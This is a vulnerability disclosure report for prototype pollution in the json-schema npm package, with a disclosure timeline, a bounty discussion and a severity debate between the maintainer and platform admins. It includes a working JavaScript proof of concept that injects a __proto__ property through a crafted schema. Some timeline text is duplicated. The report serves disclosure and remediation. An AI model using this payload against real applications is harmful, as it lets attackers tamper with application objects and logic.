Prototype Pollution in kriszyp/json-schema

Valid

Reported on

Oct 3rd 2021

Description

A constructed payload sent to validate will lead to prototype pollution.

Proof of Concept

// PoC.js
const { validate } = require("json-schema");
const instance = JSON.parse(`
{
  "$schema":{
    "type": "object",
    "properties":{
      "__proto__": {
        "type": "object",
        
        "properties":{
          "polluted": {
              "type": "string",
              "default": "polluted"
          }
        }
      }
    },
    "__proto__": {}
  }
}`);

const a = {};
console.log(a.polluted);
validate(instance);
console.log(a.polluted);

Impact

This vulnerability is capable of make prototype pollution

Occurrences

validate.js L202-L252

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

We have contacted a member of the kriszyp/json-schema team and are waiting to hear back 2 years ago

Yoshino-s

commented 2 years ago

Researcher

It seems that author fix this vuln by self, but I still found another way to bypass the fix, i have already send the poc and another fix to author, waiting for reply

We have sent a third and final follow up to the kriszyp/json-schema team. This report is now considered stale. 2 years ago

Kris Zyp validated this vulnerability 2 years ago

Yoshino-s has been awarded the disclosure bounty

The fix bounty is now up for grabs

Kris Zyp marked this as fixed with commit 22f146 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

validate.js#L202-L252 has been validated

Kris Zyp

commented 2 years ago

Maintainer

I think Yoshino-s should get the fix bounty too. Also, I wouldn't think this should be classified as "Critical", using json-schema with user-provided/arbitrary schemas is probably very rare, schemas typically have the same secure origination as code itself.

Jamie Slome

commented 2 years ago

Admin

@kriszyp - can you confirm the severity that you think is more appropriate, then I will go ahead and update the published CVE! 👍

Jamie Slome

commented 2 years ago

Admin

We can reward @yoshino-s the fix bounty as well. Can you attach a PR / commit from the researcher just to confirm this?

Kris Zyp

commented 2 years ago

Maintainer

These commits were directly from yoshino-s's suggested code: https://github.com/kriszyp/json-schema/commit/f6f6a3b02d667aa4ba2d5d50cc19208c4462abfa https://github.com/kriszyp/json-schema/commit/b62f1da1ff5442f23443d6be6a92d00e65cba93a I would estimate severity (using the calculator at 7.7/High.

Jamie Slome

commented 2 years ago

Admin

Can you recommend the CVSS string for this score?

Currently, it is:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

abbaskiko

commented 2 years ago

to join this conversation

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

We have contacted a member of the kriszyp/json-schema team and are waiting to hear back 2 years ago

Yoshino-s

commented 2 years ago

Researcher

It seems that author fix this vuln by self, but I still found another way to bypass the fix, i have already send the poc and another fix to author, waiting for reply

We have sent a third and final follow up to the kriszyp/json-schema team. This report is now considered stale. 2 years ago

Kris Zyp validated this vulnerability 2 years ago

Yoshino-s has been awarded the disclosure bounty

The fix bounty is now up for grabs

Kris Zyp marked this as fixed with commit 22f146 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

validate.js#L202-L252 has been validated

Kris Zyp

commented 2 years ago

Maintainer

Jamie Slome